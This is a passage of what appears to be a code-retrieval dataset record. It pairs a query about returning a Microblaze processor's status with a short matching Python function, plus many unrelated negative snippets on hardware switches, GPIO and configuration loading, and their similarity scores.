hw_initialization: bool = True):\n self.num_pump_connected = await self._assign_pump_address()\n if hw_initialization:\n await self._hw_init()", "def _set_switch(self, switch, state):\n switch = self.switch_by_label(switch)\n id = self.switches[switch.label].id\n # make sure that the serial port is open\n self.assure_serial()\n # create command for the arduino and send it\n input_string = str(id[0]) + str(id[1]) + str(state)\n self.serial.write(input_string.encode('ascii'))\n time.sleep(self.WRITE_DELAY)\n # read switch after setting it, to confirm switching\n try:\n self._get_switch(switch)\n except SwitchError:\n raise SwitchError(\"Reading switch after switching was \"\n \"unsuccessful: Indicators of the switch show \"\n f\"{switch.indicators}.\")\n # raise error, if the switching was not successful\n if switch.state != state:\n raise SwitchError(\"Setting the switch was unsuccessful. 
The \"\n f\"switch should be in state {state}, but \"\n f\"the indicators show state {switch.state}.\")", "def load(self):\n # copy defaults\n self.config = dict(**self.DEFAULTS)\n # read configuration\n savedconfig = Blender.Registry.GetKey(self.CONFIG_NAME, True)\n # port config keys from old versions to current version\n try:\n self.config[\"IMPORT_TEXTURE_PATH\"] = savedconfig[\"TEXTURE_SEARCH_PATH\"]\n except:\n pass\n try:\n self.config[\"IMPORT_FILE\"] = Blender.sys.join(\n savedconfig[\"NIF_IMPORT_PATH\"], savedconfig[\"NIF_IMPORT_FILE\"])\n except:\n pass\n try:\n self.config[\"EXPORT_FILE\"] = savedconfig[\"NIF_EXPORT_FILE\"]\n except:\n pass\n try:\n self.config[\"IMPORT_REALIGN_BONES\"] = savedconfig[\"REALIGN_BONES\"]\n except:\n pass\n try:\n if self.config[\"IMPORT_REALIGN_BONES\"] == True:\n self.config[\"IMPORT_REALIGN_BONES\"] = 1\n elif self.config[\"IMPORT_REALIGN_BONES\"] == False:\n self.config[\"IMPORT_REALIGN_BONES\"] = 0\n except:\n pass\n try:\n if savedconfig[\"IMPORT_SKELETON\"] == True:\n self.config[\"IMPORT_SKELETON\"] = 1\n elif savedconfig[\"IMPORT_SKELETON\"] == False:\n self.config[\"IMPORT_SKELETON\"] = 0\n except:\n pass\n # merge configuration with defaults\n if savedconfig:\n for key, val in self.DEFAULTS.iteritems():\n try:\n savedval = savedconfig[key]\n except KeyError:\n pass\n else:\n if isinstance(savedval, val.__class__):\n self.config[key] = savedval\n # store configuration\n Blender.Registry.SetKey(self.CONFIG_NAME, self.config, True)\n # special case: set log level here\n self.update_log_level(\"LOG_LEVEL\", self.config[\"LOG_LEVEL\"])", "async def test_switch(\n hass: HomeAssistant, mock_bridge_v2, v2_resources_test_data\n) -> None:\n await mock_bridge_v2.api.load_test_data(v2_resources_test_data)\n\n await setup_platform(hass, mock_bridge_v2, \"switch\")\n # there shouldn't have been any requests at this point\n assert len(mock_bridge_v2.mock_requests) == 0\n # 2 entities should be created from test data\n assert len(hass.states.async_all()) == 2\n\n # test config switch to enable/disable motion sensor\n test_entity = hass.states.get(\"switch.hue_motion_sensor_motion\")\n assert test_entity is not None\n assert test_entity.name == \"Hue motion sensor Motion\"\n assert test_entity.state == \"on\"\n assert test_entity.attributes[\"device_class\"] == \"switch\"", "def init_led():\r\n global led\r\n led = LED(LED_GPIO_PIN)\r\n led.off()", "def load(self):\n\n address = 0\n\n # For now, we've just hardcoded a program:\n\n program = [\n # From print8.ls8\n 0b10000010, # LDI R0,8\n 0b00000000,\n 0b00001000,\n 0b01000111, # PRN R0\n 0b00000000,\n 0b00000001, # HLT\n ]\n\n for instruction in program:\n self.ram[address] = instruction\n address += 1", "def setup_platform(hass, config, add_devices_callback, discovery_info=None):\n add_devices_callback([\n HE853Switch('OviSwitch', STATE_ON),\n HE853Switch('AC', STATE_OFF)\n ])", "def read_switch(self):\n return GPIO.input(SWITCH_PIN)", "def load(self):\n\n address = 0\n\n # For now, we've just hardcoded a program:\n\n program = [\n # From print8.ls8\n 0b10000010, # LDI R0,8\n 0b00000000,\n 0b00001000,\n 0b01000111, # PRN R0\n 0b00000000,\n 0b00000001, # HLT\n ]\n\n for instruction in program:\n self.ram[address] = instruction\n address += 1", "def switch_features_handler(self, ev):\n\n super(RyuRest, self).switch_features_handler(ev) # Call the original switch features method\n datapath = ev.msg.datapath\n self.switches[datapath.id] = datapath\n self.mac_to_port.setdefault(datapath.id, {})", "def 
set_switch_config(self, config_flags, miss_send_len):\n ofproto = self.datapath.ofproto\n parser = self.datapath.ofproto_parser\n self.logger.info(\"Setting config on switch \"\n \"dpid=%s to config_flags flag=%s and \"\n \"miss_send_len=%s bytes\",\n self.dpid, config_flags, miss_send_len)\n try:\n self.datapath.send_msg(parser.OFPSetConfig(\n self.datapath,\n config_flags,\n miss_send_len))\n except:\n #*** Log the error and return 0:\n exc_type, exc_value, exc_traceback = sys.exc_info()\n self.logger.error(\"Failed to set switch config. \"\n \"Exception %s, %s, %s\",\n exc_type, exc_value, exc_traceback)\n return 0\n return 1", "def get_switch(self, conf, dpid):\n\t\tpass", "def set_switch(self, values):\n for label, val in values.items():\n # if label is not a label, get the according label\n if isinstance(label, (ArduinoSwitchControlSwitch,\n ArduinoSwitchControlConnector)):\n label = label.label\n # if switch label, get the parameter to switch the switch\n if label in self.switches:\n par = self.parameters[f'switch_{label}_mode']\n # if input label, get the parameter to set a route from this input\n elif label in self.inputs:\n par = self.parameters[f'route_{label}_mode']\n # if parameter name, get the right parameter\n elif label.startswith('switch_'):\n if label[7:] not in [str(lab) for lab in self.switches]:\n raise SwitchError(f\"No switch with label {label[7:]}\")\n par = self.parameters[f'{label}_mode']\n elif label.startswith('route_'):\n if label[6:] not in [str(lab) for lab in self.inputs]:\n raise ConnectorError(f\"No input with label {label[6:]}\")\n if f'{label}_mode' not in self.parameters:\n raise RouteError(f\"No route starting at input {label[6:]}\")\n par = self.parameters[f'{label}_mode']\n else:\n raise ValueError(f\"parameter label {label} not recognized.\")\n\n # apply selected parameter for switching\n par(val)", "def load_config(self):\n if self.get_vrps():\n self.process_vrps()", "def update_from_file(self):\n config_path = os.environ.get('MINDINSIGHT_CONFIG', '')\n if not config_path:\n return\n\n config_module = None\n\n # python:full.path.for.config.module\n if config_path.startswith('python:'):\n config_module = import_module(config_path[len('python:'):])\n\n # file:full/path/for/config.py\n elif config_path.startswith('file:'):\n config_path = config_path[len('file:'):]\n module_name = '__mindinsightconfig__'\n config_module = types.ModuleType(module_name)\n machinery = import_module('importlib.machinery')\n loader = machinery.SourceFileLoader(module_name, config_path)\n loader.exec_module(config_module)\n\n if config_module is None:\n return\n\n for setting in dir(config_module):\n if setting.isupper() and setting in self._default_settings:\n setting_value = getattr(config_module, setting)\n setattr(self, setting, setting_value)\n self._explicit_settings.add(setting)", "def setup():\n GPIO.setmode(GPIO.BCM)\n for pin in [CHURCH, CHURCH + 1, HALL, HALL + 1]:\n GPIO.setup(pin, GPIO.OUT, initial=GPIO.HIGH)", "def __init__(self,\n device_name,\n create_device_func,\n props,\n hub_name_prop,\n primary_port_prop,\n secondary_port_prop,\n ethernet_switch_prop,\n ethernet_port_prop,\n get_switchboard_if_initialized,\n power_and_data_share_cable=False,\n pre_off_func=None):\n super().__init__(device_name=device_name)\n\n self._create_device_func = create_device_func\n self._hub_name_prop = hub_name_prop\n self._primary_port_prop = primary_port_prop\n self._secondary_port_prop = secondary_port_prop\n self._props = props\n self._ethernet_switch = None\n\n # Set the 
properties\n self._get_switchboard_if_initialized = get_switchboard_if_initialized\n self._power_and_data_share_cable = power_and_data_share_cable\n self._pre_off_func = pre_off_func\n self._ethernet_switch_prop = ethernet_switch_prop\n self._ethernet_port_prop = ethernet_port_prop", "def on(config: dict):\n switch_device(config, config[\"inching\"], \"on\")", "def load_device():", "def settings_load(self):\n self.ui.spinBox_ATSP.setValue(self.default['ATSP'])\n\n if self.default['serialLabel'] == 'bt':\n self.ui.btRadio.setChecked(True)\n try:\n os.system(\"blueman-manager\")\n except:\n print \"Please install 'blueman' package\"\n elif self.default['serialLabel'] == 'usb':\n self.ui.usbRadio.setChecked(True)\n else:\n self.ui.devRadio.setChecked(True)\n\n if self.default['units'] == 'metric':\n self.ui.units_metric_radio.setChecked(True)\n else:\n self.ui.units_US_radio.setChecked(True)\n\n return", "def enable_setup(self):\n self.high_ver_entry.config(state=\"normal\")\n self.low_ver_entry.config(state=\"normal\")\n self.left_hor_entry.config(state=\"normal\")\n self.right_hor_entry.config(state=\"normal\")", "def presetRead():\n\n global preset_sw \n \n while True:\n for i in range(6):\n preset_sw[i][1] = GPIO.input(preset_sw[i][0])\n sleep (1)", "def _add_to_switch(self, _switch, context):\n _network = context.current['id']\n _vlanid = context.current['provider:segmentation_id']\n\n # BRIDGE_PORT_URL = '{url_prefix}://{switch_name_or_ip}:{port}/networks/{vlan}/{network_id}/{port_id}'\n for _switchport in _switch.get('ports'):\n try:\n _request = requests.put(\n BRIDGE_PORT_URL.format(url_prefix=self.url_prefix,\n port=self.protocol_port,\n switch_name_or_ip=_switch.get('name'),\n vlan=unicode(_vlanid),\n network_id=_network,\n port_id=_switchport)\n )\n LOG.info(\n _LI('Sending PUT API Call to Switch %s'),\n _request.url\n )\n if _request.status_code != requests.codes.ok:\n LOG.error(\n _LE(\"Failed To Provision Switch %s\"), _request.text)\n raise MechanismDriverError()\n except ConnectionError:\n LOG.error(\n _LE('Failed to connect to switch %s'),\n _request.url\n )", "def set_config(self, settings='settings.json'): # called from button_set object \n self.settings['lights_on'] = self.lights_on.get()\n self.settings['lights_off'] = self.lights_off.get()\n self.settings['photo1'] = self.photo1.get()\n self.settings['photo2'] = self.photo2.get()\n self.settings['smc1'] = self.smc1.get()\n self.settings['smc2'] = self.smc2.get()\n self.settings['smc3'] = self.smc3.get()\n self.settings['smc4'] = self.smc4.get()\n self.settings['watering'] = self.watering.get()\n self.settings['cycle'] = self.cycle.get()\n settings_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), settings)\n if os.path.exists(settings_path):\n with open(settings_path, 'w') as jsonfile:\n jsonfile.write(json.dumps(self.settings, indent=4))\n self.active_changes = True # (flag) changes are active!", "def initialize_light_pins(pi, pins):\n for pin in pins:\n pi.set_mode(pin, pigpio.OUTPUT)\n pi.set_pull_up_down(pin, pigpio.PUD_DOWN)", "def _init_hardware(self):\n return", "def load(self):\n\n address = 0\n\n # For now, we've just hardcoded a program:\n\n if len(sys.argv) != 2:\n print(\"Usage: cpu.py filename\")\n sys.exit(1)\n \n filename = sys.argv[1]\n\n try:\n with open(filename) as f:\n for line in f:\n \n instruction = line.split(\"#\")[0].strip()\n \n if instruction == \"\":\n continue\n\n val = int(instruction, 2) \n\n self.ram_write(address, val)\n\n address += 1\n\n except FileNotFoundError:\n 
print(f\"File {filename} not found\")\n sys.exit(2)", "def load():\n\n global R, P, NP, update, update_available, region_dict\n\n loader = GoSmartParameterLoader(gosmart._prefix)\n loader.initiate()\n\n R = loader.get_regions()\n P, NP = loader.get_parameters()\n\n region_dict = loader.get_region_dict()\n\n update = gosmart.status.StatusUpdater()\n update_available = update.connect()", "def enable(self):\n if not self.tm_started:\n for name, tm in self.air_traffic_manager.items():\n logging.debug(\"Starting tm %s\" % name)\n tm.start()\n tm_started = True\n\n logging.debug(\"Enabling switch %s\" % self.name)\n self.disabled = False", "def _add_switch(self, switchdesc):\n # Check switch definition parameters\n switch_attributes = list(switchdesc.keys())\n if not set(switch_attributes).issubset(self.switch_attributes):\n raise ValueError(\n \"Switch definition: '{0}' defined in '{1}' is not supported. \"\n \"Supported switch parameters are '{2}'.\".format(\n json.dumps(switchdesc, indent=2), self._xmlfile,\n self.switch_attributes))\n for mandatory_parameter in self.switch_attributes[:2]:\n if mandatory_parameter not in switch_attributes:\n raise ValueError(\n \"A '{0}' parameter is required in switch definition: \"\n \"'{1}' defined in '{2}'.\".format(\n mandatory_parameter, json.dumps(switchdesc, indent=2),\n self._xmlfile))\n\n # Check the name of the switch is not already reserved\n switch_name = switchdesc[self.switch_attributes[0]][0]\n if switch_name in self._switches:\n raise ValueError(\n \"The switch name '{0}' defined in '{1}' is \"\n \"already used.\".format(switch_name, self._xmlfile))\n\n # Create the switch control\n switch_paths = {}\n for pathdesc in switchdesc[self.switch_attributes[1]]:\n path_name = pathdesc[self.switch_path[0]][0]\n path_boxes = [box[self.unit_attributes[0]]\n for box in pathdesc[self.switch_path[1]]]\n switch_paths[path_name] = path_boxes\n switch_keys = list(switch_paths.keys())\n control = controls[\"Enum\"](\n choices=tuple(switch_keys),\n switch_name=switch_name,\n desc=(\"Switch between paths '{0}:{1}' defined in pipeline '{2}'\"\n \".\".format(switch_name, \"-\".join(switch_keys), self.id)))\n setattr(self.inputs, switch_name, control)\n self._switches[switch_name] = switch_paths\n control.add_observer(\"value\", self._update_activation)\n control.value = switch_keys[0]", "def set_com_pins_config(set_sequential, enable_remap):\n if set_sequential:\n a4bit = 0x00\n else:\n a4bit = 0x10\n\n if enable_remap:\n a5bit = 0x20\n else:\n a5bit = 0x00\n\n send_command(0xDA)\n send_command(0x02 | a4bit | a5bit)", "def load_and_reset(self, params, device, dtype):\n self.hgn.load(params['load_path'])\n if 'reset' in params:\n if isinstance(params['reset'], list):\n for net in params['reset']:\n assert net in ['encoder', 'decoder', 'hamiltonian', 'transformer']\n else:\n assert params['reset'] in ['encoder', 'decoder', 'hamiltonian', 'transformer']\n if 'encoder' in params['reset']:\n self.hgn.encoder = loader.instantiate_encoder(params, device, dtype)\n if 'decoder' in params['reset']:\n self.hgn.decoder = loader.instantiate_decoder(params, device, dtype)\n if 'transformer' in params['reset']:\n self.hgn.transformer = loader.instantiate_transformer(params, device, dtype)\n if 'hamiltonian' in params['reset']:\n self.hgn.hnn = loader.instantiate_hamiltonian(params, device, dtype)", "def on(self, include_ethernet=False):\n if not self.healthy:\n self.health_check()\n self._hub.switch_power.power_on(self.port_number)\n if self.secondary_port_number is not 
None:\n self._hub.switch_power.power_on(self.secondary_port_number)\n if include_ethernet:\n self.ethernet_on()\n time.sleep(5) # Small delay to give time for 'dev/tty' to populate\n switchboard = self._get_switchboard_if_initialized()\n if switchboard:\n switchboard.open_all_transports()", "async def async_setup_entry(hass, config_entry, async_add_devices):\n loxconfig = hass.data[DOMAIN]['loxconfig']\n identify = loxconfig['msInfo']['serialNr']\n\n devices = []\n all_dimmers = []\n all_light_controller_dimmers = []\n all_color_picker = []\n all_switches = []\n all_dimmers = get_all_dimmer(loxconfig)\n\n for light_controller in get_all_light_controller(loxconfig):\n light_controller.update({'room': get_room_name_from_room_uuid(loxconfig, light_controller.get('room', '')),\n 'cat': get_cat_name_from_cat_uuid(loxconfig, light_controller.get('cat', '')),\n 'async_add_devices': async_add_devices\n })\n new_light_controller = LoxonelightcontrollerV2(**light_controller)\n\n if 'subControls' in light_controller:\n if len(light_controller['subControls']) > 0:\n for sub_controll in light_controller['subControls']:\n if light_controller['subControls'][sub_controll]['type'] == \"Dimmer\":\n light_controller['subControls'][sub_controll]['room'] = light_controller.get('room', '')\n light_controller['subControls'][sub_controll]['cat'] = light_controller.get('cat', '')\n light_controller['subControls'][sub_controll][\n 'lightcontroller_id'] = new_light_controller.unique_id\n all_light_controller_dimmers.append(light_controller['subControls'][sub_controll])\n\n elif light_controller['subControls'][sub_controll]['type'] == \"Switch\":\n light_controller['subControls'][sub_controll]['room'] = light_controller.get('room', '')\n light_controller['subControls'][sub_controll]['cat'] = light_controller.get('cat', '')\n light_controller['subControls'][sub_controll][\n 'lightcontroller_id'] = new_light_controller.unique_id\n all_switches.append(light_controller['subControls'][sub_controll])\n\n elif light_controller['subControls'][sub_controll]['type'] == \"ColorPickerV2\":\n light_controller['subControls'][sub_controll]['room'] = light_controller.get('room', '')\n light_controller['subControls'][sub_controll]['cat'] = light_controller.get('cat', '')\n light_controller['subControls'][sub_controll][\n 'lightcontroller_id'] = new_light_controller.unique_id\n all_color_picker.append(light_controller['subControls'][sub_controll])\n\n hass.bus.async_listen(EVENT, new_light_controller.event_handler)\n devices.append(new_light_controller)\n\n _ = all_dimmers + all_light_controller_dimmers\n\n for dimmer in _:\n if dimmer in all_light_controller_dimmers:\n dimmer.update({'room': get_room_name_from_room_uuid(loxconfig, light_controller.get('room', '')),\n 'cat': get_cat_name_from_cat_uuid(loxconfig, light_controller.get('cat', '')),\n 'async_add_devices': async_add_devices\n })\n else:\n dimmer.update({'room': get_room_name_from_room_uuid(loxconfig, dimmer.get('room', '')),\n 'cat': get_cat_name_from_cat_uuid(loxconfig, dimmer.get('cat', '')),\n 'async_add_devices': async_add_devices\n })\n\n new_dimmer = LoxoneDimmer(**dimmer)\n hass.bus.async_listen(EVENT, new_dimmer.event_handler)\n devices.append(new_dimmer)\n\n for switch in all_switches:\n switch.update({'room': get_room_name_from_room_uuid(loxconfig, light_controller.get('room', '')),\n 'cat': get_cat_name_from_cat_uuid(loxconfig, light_controller.get('cat', '')),\n 'async_add_devices': async_add_devices\n })\n new_switch = LoxoneLight(**switch)\n 
hass.bus.async_listen(EVENT, new_switch.event_handler)\n devices.append(new_switch)\n\n for color_picker in all_color_picker:\n color_picker.update({'room': get_room_name_from_room_uuid(loxconfig, light_controller.get('room', '')),\n 'cat': get_cat_name_from_cat_uuid(loxconfig, light_controller.get('cat', '')),\n 'async_add_devices': async_add_devices\n })\n new_color_picker = LoxoneColorPickerV2(**color_picker)\n hass.bus.async_listen(EVENT, new_color_picker.event_handler)\n devices.append(new_color_picker)\n\n async_add_devices(devices, True)\n return True", "def do_load_environment(self, *arg):\n print(\"Loading sensors\")\n self.environment = ArduinoSerialMonitor(auto_detect=False)\n self.do_enable_sensor('environment', delay=1)", "def update(self):\n try:\n if not self._sysinfo:\n self._sysinfo = self.smartplug.sys_info\n self._mac = self.smartplug.mac\n self._model = self.smartplug.model\n if self.smartplug.context is None:\n self._alias = self.smartplug.alias\n self._device_id = self._mac\n else:\n self._alias = self._plug_from_context[\"alias\"]\n self._device_id = self.smartplug.context\n\n if self.smartplug.context is None:\n self._state = self.smartplug.state == self.smartplug.SWITCH_STATE_ON\n else:\n self._state = self._plug_from_context[\"state\"] == 1\n\n if self.smartplug.has_emeter:\n emeter_readings = self.smartplug.get_emeter_realtime()\n\n self._emeter_params[ATTR_CURRENT_POWER_W] = \"{:.2f}\".format(\n emeter_readings[\"power\"]\n )\n self._emeter_params[ATTR_TOTAL_ENERGY_KWH] = \"{:.3f}\".format(\n emeter_readings[\"total\"]\n )\n self._emeter_params[ATTR_VOLTAGE] = \"{:.1f}\".format(\n emeter_readings[\"voltage\"]\n )\n self._emeter_params[ATTR_CURRENT_A] = \"{:.2f}\".format(\n emeter_readings[\"current\"]\n )\n\n emeter_statics = self.smartplug.get_emeter_daily()\n try:\n self._emeter_params[ATTR_TODAY_ENERGY_KWH] = \"{:.3f}\".format(\n emeter_statics[int(time.strftime(\"%e\"))]\n )\n except KeyError:\n # Device returned no daily history\n pass\n\n self._available = True\n\n except (SmartDeviceException, OSError) as ex:\n if self._available:\n _LOGGER.warning(\n \"Could not read state for %s: %s\", self.smartplug.host, ex\n )\n self._available = False", "def _load_config_file(self, config):\n #Now load the config file\n self.config = load_config(config, logger=None)\n\n #Instantiate links to power input (AI) and control output (AO) if the clients\n #were not passed in directly. 
THis allows us to still run this off of main\n #instead of a launcher if required.\n if self._ai_client == None:\n self._ai_client = nidaqmx_card_server.Client(\n host=self.config[\"power_input_host\"],\n port=self.config[\"power_input_port\"]\n )\n if self._ao_client == None:\n self._ao_client = nidaqmx_card_server.Client(\n host=self.config[\"ctrl_output_host\"],\n port=self.config[\"ctrl_output_port\"]\n )\n\n\n self._ai_channel = self.config[\"power_input_channel\"]\n self._hwc_ai_channel = self.config['hardware_ctrl_input_channel']\n self._ao_channel = self.config[\"ctrl_output_channel\"]\n\n # Configure default parameters\n self.min_voltage = self.config['min_output_voltage'] #Minimum output voltage\n self.max_voltage = self.config['max_output_voltage'] #Maximum output voltage\n self.gain = self.config['gain'] #\"Gain\" between measured voltage and corresponding power\n # NOTE: Internally we store all measured powers as the raw voltages\n # we then only multiply by the gain factor when displaying\n # it to the user.\n self.max_input_voltage = self.config['max_input_voltage'] #Maximum possible input voltage, used for scaling\n #the DAQ acquisition range.\n\n self._hwc_thresh = self.config['hardware_ctrl_thresh']; #Threshold to turn hardware control on/off\n\n #Loading PID parameters\n self.paramP = self.config[\"pid\"][\"p\"]\n self.paramI = self.config[\"pid\"][\"i\"]\n self.paramD = self.config[\"pid\"][\"d\"]\n self.paramMemory = self.config[\"memory\"] #\n self._update_voltageSetpoint_fromGUI()\n self._update_PID()\n\n self.numReadsPerCycle = self.config[\"reads_per_cycle\"] #Number of the reads on the DAQ card that are averaged over for an update cycle.", "def configure_matrixlight(self, config):\n raise NotImplementedError", "def update_lights(self, light_data):\n self.current_brightness = self.brightness\n self.brightness = light_data.get('brightness')\n self.power_state = light_data.get('power_state')\n self._update_board()", "def _load_state(self, config_path=\"\"):\n if not config_path:\n config_path = LAST_SESSION\n try:\n with open(config_path, 'rb') as f:\n data = pickle.load(f)\n self.ui.lineEdit_output_path.setText(data['output_dir'])\n\n #self.ui.lineEdit_device.setText(data['device'])\n dev = data['device']\n index = self.ui.comboBox_device.findText(dev)\n if index != -1:\n self.ui.comboBox_device.setCurrentIndex(index)\n self._get_device_model()\n\n self.ui.lineEdit_data_bits.setText(data['event_bits'])\n self.ui.lineEdit_pulse_freq.setText(data['freq'])\n self.ui.checkBox_timestamp.setChecked(data['timestamp'])\n self.ui.checkBox_comm.setChecked(data['comm_interface'])\n self.ui.checkBox_analog_channels.setChecked(data['analog_on'])\n self.ui.lineEdit_analog_channels.setText(str(data['analog_channels']))\n self.ui.comboBox_analog_freq.setCurrentIndex(data['analog_sample_rate'])\n self.ui.comboBox_dtype.setCurrentIndex(data['analog_dtype'])\n\n self.digital_labels = data['labels']\n self.analog_labels = data.get(\"analog_labels\", self.analog_labels)\n\n # counter input\n index = self.ui.comboBox_ci.findText(data.get(\"counter_input_terminal\", \"ctr0\"))\n if index != -1:\n self.ui.comboBox_ci.setCurrentIndex(index)\n self.ui.checkBox_ci.setChecked(data.get(\"counter_input_on\", False))\n self.ui.comboBox_ci.setEnabled(self.ui.checkBox_ci.isChecked())\n\n # go ahead and polulate the table with the digital labels\n self.ui.tabWidget.setCurrentIndex(0)\n self._setup_table_digital()\n \n self.write_text(\"Loaded config @ {} successfully.\".format(config_path))\n except 
Exception as e:\n print(e)\n self.write_text(\"Couldn't load previous session. Using defaults.\")", "def switch_update(event):\n if (\n not isinstance(event.device, rfxtrxmod.LightingDevice)\n or event.device.known_to_be_dimmable\n or event.device.known_to_be_rollershutter\n ):\n return\n\n new_device = get_new_device(event, config, RfxtrxSwitch)\n if new_device:\n new_device.apply_event(event)\n add_entities_callback([new_device])", "def load_module(name):\n return __import__(\"metaswitch.%s\" % name,\n fromlist=[\"ROUTES\"])", "def light_action():\n if light_btn.isChecked():\n self.variables.default_values_dict[\"settings\"][\"external_lights\"] = True\n else:\n self.variables.default_values_dict[\"settings\"][\n \"external_lights\"\n ] = False", "def _update_board(self):\n if self.power_state == \"ON\":\n # Only update brightness if on. Will adjust from most recent brightness level.\n self._update_brightness()\n else:\n # Case where called to switch off\n self._update_color(OFF)\n logger.info(self.power_state)\n logger.info(self.brightness)", "async def reload_platform(self) -> None:", "def load_config(self):\n with open(self.TEMPERATURE_CONFIG_FILE_PATH, 'r') as file:\n self.config = json.load(file)", "def initialConfig(self):\r\r\n\r\r\n loggerCmw = logging.getLogger('initialConfig')\r\r\n\r\r\n self.set_scenario()\r\r\n\r\r\n self.set_default_rf_settings()\r\r\n\r\r\n self.physical_downlink_settings()\r\r\n\r\r\n self.physical_uplink_settings()\r\r\n\r\r\n self.connection_config()\r\r\n\r\r\n self.network_settings()\r\r\n\r\r\n self.set_conn_type(conn= self.connTypeEnum.CS)\r\r\n\r\r\n self.waitForCompletion()" ]
[ "0.62282544", "0.5851503", "0.5757967", "0.5553404", "0.5420665", "0.5405235", "0.5385367", "0.53103375", "0.5305637", "0.52973616", "0.5270049", "0.52667636", "0.5264424", "0.52271485", "0.5182084", "0.51805335", "0.51612717", "0.515244", "0.5107933", "0.50897145", "0.50789636", "0.5074718", "0.5069044", "0.50566053", "0.50538623", "0.504823", "0.5027205", "0.4997396", "0.49921843", "0.49845707", "0.4978585", "0.4971486", "0.49591947", "0.49492413", "0.4944295", "0.49419063", "0.49410403", "0.4931611", "0.4925331", "0.49179688", "0.49130747", "0.4909243", "0.4905791", "0.48958603", "0.48848465", "0.4880328", "0.4871189", "0.4867395", "0.4865479", "0.4863431", "0.4860975", "0.4856747", "0.48258957", "0.48222274", "0.48133218", "0.48081884", "0.48074207", "0.4805745", "0.47989467", "0.47944674", "0.47920433", "0.4790161", "0.4787899", "0.4786276", "0.47746179", "0.47736594", "0.47706538", "0.4766932", "0.4749725", "0.47308502", "0.4728061", "0.47268727", "0.47265562", "0.471514", "0.4715032", "0.47057644", "0.47009686", "0.47000623", "0.46990106", "0.46913773", "0.4690124", "0.46860778", "0.46857008", "0.46816406", "0.46771565", "0.46662772", "0.4666076", "0.46634054", "0.46474767", "0.46454802", "0.46385962", "0.46368077", "0.46315688", "0.46262726", "0.46220857", "0.46213895", "0.4621167", "0.46205", "0.46108612", "0.46051964" ]
0.67974967
0
Returns the status of the Microblaze processor. Returns: str: The processor status ("IDLE", "RUNNING", or "STOPPED").
def status(self):
    return self.microblaze.state
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_status(self):\n return self.read_register(259, 0, 3)", "async def get_status(self) -> str:\n return await self.hw_device.status()", "def get_status(self):\n if self.vm.get_cloud_status() != \"ACTIVE\":\n return \"stopped\"\n #wait for the vm to be ready and SSH-able\n self.vm.wait_ready()\n status = self.vm.run_command(\"ctool status\", indent=0, prefix='')\n return status.strip()", "def processor():\n return uname().processor", "def processor():\n return uname().processor", "def hardware_status(self):\n stat = structs.JLinkHardwareStatus()\n res = self._dll.JLINKARM_GetHWStatus(ctypes.byref(stat))\n if res == 1:\n raise errors.JLinkException('Error in reading hardware status.')\n return stat", "def runtime_status(self):\n try:\n return self.yarn_api.state(self.app_id)\n except:\n return \"NONE\"", "def status(self):\n return self._bp.get_motor_status(self._port)", "def get_status(self):\n\n return self._system", "def get_cpu_core():\n processor_info = subprocess.getoutput('dmidecode -t processor')\n cpu_core_value = re.findall(r'(?i)Core Count:\\s+(.*?)\\n', processor_info, re.S)[0]\n log.info('cpu_core value:{}'.format(cpu_core_value))\n if cpu_core_value:\n cpu_core = cpu_core_value\n else:\n cpu_core = ''\n return cpu_core", "def status(self) -> str:\n return pulumi.get(self, \"status\")", "def status(self) -> str:\n return pulumi.get(self, \"status\")", "def status(self) -> str:\n return pulumi.get(self, \"status\")", "def status(self) -> str:\n return pulumi.get(self, \"status\")", "def status(self) -> str:\n return pulumi.get(self, \"status\")", "def status(self) -> str:\n return pulumi.get(self, \"status\")", "def status(self) -> str:\n return pulumi.get(self, \"status\")", "def status(self) -> str:\n return pulumi.get(self, \"status\")", "def status(self) -> str:\n return pulumi.get(self, \"status\")", "def status(self) -> str:\n return pulumi.get(self, \"status\")", "def status(self) -> str:\n return pulumi.get(self, \"status\")", "def status(self) -> str:\n return pulumi.get(self, \"status\")", "def status(self) -> str:\n return pulumi.get(self, \"status\")", "def status(self) -> str:\n return pulumi.get(self, \"status\")", "def status(self) -> str:\n return pulumi.get(self, \"status\")", "def status(self) -> str:\n return pulumi.get(self, \"status\")", "def status(self) -> str:\n return pulumi.get(self, \"status\")", "def status(self) -> str:\n return pulumi.get(self, \"status\")", "def status(self) -> str:\n return pulumi.get(self, \"status\")", "def status(self) -> str:\n return pulumi.get(self, \"status\")", "def status(self) -> str:\n return pulumi.get(self, \"status\")", "def status(self) -> str:\n return pulumi.get(self, \"status\")", "def status(self) -> str:\n return pulumi.get(self, \"status\")", "def status(self) -> str:\n return pulumi.get(self, \"status\")", "def status(self) -> str:\n return pulumi.get(self, \"status\")", "def status(self):\n status_filename = os.path.join(self.path, 'brightness')\n with open(status_filename) as status_fp:\n result = status_fp.read()\n status_text = result.strip()\n try:\n status = int(status_text)\n except ValueError:\n return status_text\n return status", "def get_cpuinfo() -> str:\n\n # Read /proc/cpuinfo\n try:\n with open('/proc/cpuinfo', 'r') as f:\n return f.read()\n except IOError:\n print('Error: Could not read /proc/cpuinfo', file = sys.stderr)\n return ''", "def get_cpu_mode(self):\n\t\treturn call_sdk_function('PrlSrvCfg_GetCpuMode', self.handle)", "def get_cpu_info():\n try:\n cpu_info = 
subprocess.check_output('lscpu')\n return cpu_info\n except OSError:\n return None", "def cpuinfo(self):\n \n command = 'cat /proc/cpuinfo'\n\tpipe = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n stdout, stderr = pipe.communicate()\n\tinfo = stdout.strip()\n cpu_type = None\n\tn_proc = 0\n\tfor line in info.split('\\n'):\n if 'model name' in line:\n\t n_proc += 1\n if cpu_type is None:\n\t\t cpu_type = ' '.join(line.split(':')[-1].strip().split())\n\t\n\treturn (cpu_type, n_proc)", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return 